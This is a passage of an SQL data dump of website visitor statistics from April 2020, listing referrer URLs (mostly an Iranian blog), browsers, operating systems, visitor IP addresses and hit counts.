(1939,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(1940,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.67.210','000',0,1,0),
(1941,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.155.21','000',0,1,0),
(1942,'2020-04-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.224.105.50','000',0,1,0),
(1943,'2020-04-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','134.122.111.78','000',0,2,0),
(1944,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.14.15','000',0,1,0),
(1945,'2020-04-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1946,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.84.151','000',0,1,0),
(1947,'2020-04-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.74','000',0,1,0),
(1948,'2020-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.0.28','000',0,1,0),
(1949,'2020-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(1950,'2020-04-17','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(1951,'2020-04-18','https://www.virus-schutzmasken.de','Unknown','Unknown','Unknown',NULL,NULL,'','54.93.232.202','000',0,1,0),
(1952,'2020-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.84.81','000',0,1,0),
(1953,'2020-04-18','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.248.3','000',0,1,0),
(1954,'2020-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.75','000',0,2,0),
(1955,'2020-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.9','000',0,1,0),
(1956,'2020-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.74','000',0,4,0),
(1957,'2020-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(1958,'2020-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(1959,'2020-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.14.15','000',0,1,0),
(1960,'2020-04-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','104.168.44.158','000',0,3,0),
(1961,'2020-04-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1962,'2020-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.237.214','000',0,1,0),
(1963,'2020-04-18','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.171.130','000',0,1,0),
(1964,'2020-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.244.226','000',0,1,0),
(1965,'2020-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(1966,'2020-04-18','http://ictbank.ir/blog','Firefox','OS X','10.9',NULL,NULL,'','84.17.25.191','000',0,1,0),
(1967,'2020-04-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.65','000',0,1,0),
(1968,'2020-04-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(1969,'2020-04-19','https://www.virus-schutzmasken.de','Unknown','Windows','6.1',NULL,NULL,'','3.126.84.19','000',0,2,0),
(1970,'2020-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.202.104','000',0,1,0),
(1971,'2020-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.170.116','000',0,1,0),
(1972,'2020-04-19','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','142.93.87.106','000',0,1,0),
(1973,'2020-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.49.100','000',0,1,0),
(1974,'2020-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.123.209','000',0,1,0),
(1975,'2020-04-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.50.130.112','000',0,1,0),
(1976,'2020-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1977,'2020-04-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','27.189.251.86','000',0,1,0),
(1978,'2020-04-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.204.181','000',0,3,0),
(1979,'2020-04-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.143.220.142','000',0,1,0),
(1980,'2020-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,3,0),
(1981,'2020-04-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.50.130.112','000',0,1,0),
(1982,'2020-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.221.3','000',0,1,0),
(1983,'2020-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.225.97','000',0,1,0),
(1984,'2020-04-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1985,'2020-04-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','220.156.162.236','000',0,1,0),
(1986,'2020-04-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','61.91.182.22','000',0,1,0),
(1987,'2020-04-20','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','46.4.167.153','000',0,2,0),
(1988,'2020-04-20','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','87.241.128.181','000',0,1,0),
(1989,'2020-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.236.102','000',0,1,0),
(1990,'2020-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.41.213','000',0,1,0),
(1991,'2020-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(1992,'2020-04-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.107.188.11','000',0,3,0),
(1993,'2020-04-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(1994,'2020-04-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(1995,'2020-04-21','https://www.virus-schutzmasken.de','Unknown','Unknown','3.11',NULL,NULL,'','3.127.235.128','000',0,2,0),
(1996,'2020-04-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.140.171','000',0,1,0),
(1997,'2020-04-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','92.53.100.153','000',0,2,0),
(1998,'2020-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.144.132','000',0,1,0),
(1999,'2020-04-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','96.44.186.50','000',0,1,0),
(2000,'2020-04-21','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','78.111.166.3','000',0,1,0),
(2001,'2020-04-21','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','139.59.29.219','000',0,1,0),
(2002,'2020-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.181.191','000',0,1,0),
(2003,'2020-04-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.28.195.115','000',0,2,0),
(2004,'2020-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.199.28','000',0,1,0),
(2005,'2020-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.56.47','000',0,1,0),
(2006,'2020-04-21','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','54.193.62.8','000',0,1,0),
(2007,'2020-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2008,'2020-04-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.234.218.68','000',0,1,0),
(2009,'2020-04-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','103.242.0.134','000',0,3,0),
(2010,'2020-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2011,'2020-04-21','http://ictbank.ir:80','Chrome','Windows','10.0',NULL,NULL,'','167.71.228.159','000',0,1,0),
(2012,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','124.164.235.209','000',0,1,0),
(2013,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','120.194.7.10','000',0,1,0),
(2014,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.93.220.102','000',0,1,0),
(2015,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','124.207.57.146','000',0,1,0),
(2016,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','171.221.255.5','000',0,1,0),
(2017,'2020-04-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.59.181.92','000',0,1,0),
(2018,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.146.185','000',0,1,0),
(2019,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.254.245','000',0,1,0),
(2020,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.65','000',0,1,0),
(2021,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.196.208','000',0,1,0),
(2022,'2020-04-22','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','47.254.179.3','000',0,3,0),
(2023,'2020-04-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.50.130.112','000',0,1,0),
(2024,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','159.65.24.22','000',0,7,0),
(2025,'2020-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(2026,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,2,0),
(2027,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.23.254','000',0,1,0),
(2028,'2020-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.5.135','000',0,1,0),
(2029,'2020-04-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','156.96.113.235','000',0,1,0),
(2030,'2020-04-22','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','79.127.96.129','000',0,22,0),
(2031,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','14.162.160.224','000',0,1,0),
(2032,'2020-04-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','119.146.145.50','000',0,1,0),
(2033,'2020-04-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2034,'2020-04-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.32.135','000',0,1,0),
(2035,'2020-04-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.107.188.14','000',0,3,0),
(2036,'2020-04-23','http://ictbank.ir/','Opera','Windows','6.1',NULL,NULL,'','94.155.33.190','000',0,1,0),
(2037,'2020-04-23','http://ictbank.ir/blog','Firefox Mobile','Android','9',NULL,NULL,'','86.252.189.145','000',0,1,0),
(2038,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.108.66','000',0,1,0),
(2039,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(2040,'2020-04-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','123.206.13.46','000',0,2,0),
(2041,'2020-04-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2042,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.253.79','000',0,1,0),
(2043,'2020-04-23','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','158.46.195.1','000',0,1,0),
(2044,'2020-04-23','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','79.127.96.129','000',0,174,0),
(2045,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.144.21.56','000',0,1,0),
(2046,'2020-04-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.201.14.134','000',0,1,0),
(2047,'2020-04-23','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','90.154.102.15','000',0,4,0),
(2048,'2020-04-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,8,0),
(2049,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.203.26','000',0,1,0),
(2050,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.145.71','000',0,1,0),
(2051,'2020-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2052,'2020-04-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2053,'2020-04-23','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(2054,'2020-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2055,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.101.160','000',0,1,0),
(2056,'2020-04-23','android-app://org.vidogram.messenger/','Chrome','Android','8.1.0',NULL,NULL,'','5.124.56.30','000',0,1,0),
(2057,'2020-04-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(2058,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.117.100.252','000',0,5,0),
(2059,'2020-04-23','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','72.143.225.242','000',0,1,0),
(2060,'2020-04-23','http://ictbank.ir/blog','Safari','iOS','12.4.1',NULL,NULL,'','73.219.158.14','000',0,1,0),
(2061,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.146.63.52','000',0,2,0),
(2062,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','74.3.141.153','000',0,4,0),
(2063,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2064,'2020-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.245.100.147','000',0,1,0),
(2065,'2020-04-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.145.12.65','000',0,1,0),
(2066,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','118.98.73.2','000',0,1,0),
(2067,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','35.222.170.114','000',0,1,0),
(2068,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','209.250.235.206','000',0,1,0),
(2069,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','85.204.27.56','000',0,1,0),
(2070,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','46.8.252.130','000',0,1,0),
(2071,'2020-04-24','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','94.177.226.30','000',0,1,0),
(2072,'2020-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.247.92','000',0,1,0),
(2073,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','80.122.124.186','000',0,1,0),
(2074,'2020-04-24','http://ictbank.ir/blog','Chrome','OS X','10.12.1',NULL,NULL,'','90.154.102.15','000',0,1,0),
(2075,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','67.215.238.46','000',0,1,0),
(2076,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','117.28.250.42','000',0,1,0),
(2077,'2020-04-24','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','54.188.110.176','000',0,1,0),
(2078,'2020-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.170.116','000',0,1,0),
(2079,'2020-04-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','150.249.214.254','000',0,1,0),
(2080,'2020-04-24','android-app://org.vidogram.messenger/','Chrome','Android','8.1.0',NULL,NULL,'','2.182.161.147','000',0,1,0),
(2081,'2020-04-24','android-app://org.vidogram.messenger/','Chrome','Android','8.1.0',NULL,NULL,'','5.123.76.27','000',0,1,0),
(2082,'2020-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.173.194','000',0,1,0),
(2083,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.66.204','000',0,1,0),
(2084,'2020-04-24','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(2085,'2020-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.167.148','000',0,1,0),
(2086,'2020-04-24','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','54.36.246.232','000',0,1,0),
(2087,'2020-04-24','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','139.59.29.219','000',0,1,0),
(2088,'2020-04-24','http://ictbank.ir/blog','Firefox','Gentoo','Unknown',NULL,NULL,'','88.99.195.195','000',0,1,0),
(2089,'2020-04-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(2090,'2020-04-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.171.169.50','000',0,1,0),
(2091,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','109.110.235.40','000',0,1,0),
(2092,'2020-04-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','35.223.79.230','000',0,1,0),
(2093,'2020-04-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','209.58.129.99','000',0,4,0),
(2094,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.15.42.2','000',0,32,0),
(2095,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(2096,'2020-04-25','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','5.209.44.77','000',0,5,0),
(2097,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.202.253.78','000',0,5,0),
(2098,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.99.206.86','000',0,1,0),
(2099,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.225.126.111','000',0,1,0),
(2100,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.249.84.127','000',0,3,0),
(2101,'2020-04-25','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.84.125','000',0,3,0),
(2102,'2020-04-25','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.84.123','000',0,2,0),
(2103,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','167.99.102.248','000',0,1,0),
(2104,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','113.204.147.26','000',0,1,0),
(2105,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.30.121.226','000',0,1,0),
(2106,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(2107,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.102.6.43','000',0,2,0),
(2108,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.102.6.45','000',0,2,0),
(2109,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.249.81.121','000',0,2,0),
(2110,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.249.81.123','000',0,2,0),
(2111,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.102.9.187','000',0,1,0),
(2112,'2020-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.102.9.183','000',0,1,0),
(2113,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.170.71','000',0,1,0),
(2114,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.14.243.126','000',0,1,0),
(2115,'2020-04-25','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','223.12.144.130','000',0,1,0),
(2116,'2020-04-25','https://www.virus-schutzmasken.de','Unknown','Unknown','Unknown',NULL,NULL,'','3.124.194.171','000',0,2,0),
(2117,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','134.119.216.82','000',0,1,0),
(2118,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.9.124.188','000',0,1,0),
(2119,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.246.112','000',0,1,0),
(2120,'2020-04-25','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.107.188.12','000',0,2,0),
(2121,'2020-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.171.169.50','000',0,1,0),
(2122,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','90.154.102.15','000',0,4,0),
(2123,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.85','000',0,1,0),
(2124,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.93.117','000',0,1,0),
(2125,'2020-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','84.17.46.181','000',0,1,0),
(2126,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.116.10.39','000',0,1,0),
(2127,'2020-04-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.216.75.150','000',0,1,0),
(2128,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.183.96.122','000',0,1,0),
(2129,'2020-04-25','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,2,0),
(2130,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.33.238','000',0,1,0),
(2131,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','138.197.148.246','000',0,2,0),
(2132,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','138.197.138.211','000',0,1,0),
(2133,'2020-04-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','46.119.131.228','000',0,3,0),
(2134,'2020-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2135,'2020-04-25','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.68.152.26','000',0,1,0),
(2136,'2020-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.62.63.83','000',0,1,0),
(2137,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','167.114.172.167','000',0,1,0),
(2138,'2020-04-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.72.145.78','000',0,1,0),
(2139,'2020-04-26','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','221.231.126.2','000',0,1,0),
(2140,'2020-04-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2141,'2020-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','13.68.133.164','000',0,3,0),
(2142,'2020-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2143,'2020-04-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2144,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.168.188','000',0,1,0),
(2145,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(2146,'2020-04-26','http://www.ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','165.22.233.129','000',0,13,0),
(2147,'2020-04-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.95.8','000',0,1,0),
(2148,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.101.62','000',0,1,0),
(2149,'2020-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','92.53.100.153','000',0,1,0),
(2150,'2020-04-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.13.67.181','000',0,3,0),
(2151,'2020-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','132.145.30.166','000',0,1,0),
(2152,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.202.210','000',0,1,0),
(2153,'2020-04-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.145.12.61','000',0,1,0),
(2154,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.195.253','000',0,1,0),
(2155,'2020-04-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.22.186.115','000',0,1,0),
(2156,'2020-04-26','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','68.183.104.51','000',0,1,0),
(2157,'2020-04-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','204.187.14.71','000',0,2,0),
(2158,'2020-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','150.136.163.76','000',0,1,0),
(2159,'2020-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2160,'2020-04-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','84.17.46.201','000',0,1,0),
(2161,'2020-04-26','https://www.google.com/','Edge','Windows','10.0',NULL,NULL,'','212.0.195.11','000',0,1,0),
(2162,'2020-04-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','84.17.46.178','000',0,1,0),
(2163,'2020-04-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','139.59.117.21','000',0,1,0),
(2164,'2020-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.146.63.52','000',0,1,0),
(2165,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','130.61.10.230','000',0,1,0),
(2166,'2020-04-27','http://www.bing.com/search?q=amazon','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.109','000',0,1,0),
(2167,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','132.145.101.248','000',0,1,0),
